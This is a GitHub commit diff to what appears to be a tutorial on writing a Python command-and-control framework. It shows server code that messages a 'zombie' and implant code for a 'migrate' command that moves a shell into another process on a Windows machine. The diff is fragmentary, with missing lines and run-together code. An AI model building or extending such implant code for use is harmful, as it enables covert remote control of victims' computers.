You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
print(Fore.RED + "[!] there was an error sending the msg to the zombie...\ncheck to see if your zombie died" + Fore.WHITE)
241
+
time.sleep(2)
242
+
```
243
+
244
+
> **Client / Implant code**
245
+
246
+
```python
247
+
if":migrate:"in data:
248
+
try:
249
+
ifstr(shell.IsUserAnAdmin()) =="False":
250
+
client.send(b"You're not running in an elevated shell so we can't migrate into an existing process. Creating a process for you to migrate into. If all goes well you should have a shell soon in the newly created process!\n")
#client.send(b"[+] Sleeping for 7 seconds and wrapping things up! You should be migrated into another process now!\n")
262
+
time.sleep(7)
263
+
except:
264
+
print("some error occurred...")
265
+
```
266
+
218
267
Okay, I think that should do it! Let's go ahead and navigate into an elevated session in our Zombie list and then check out our commands. We're going to want to use the `migrate` command:
0 commit comments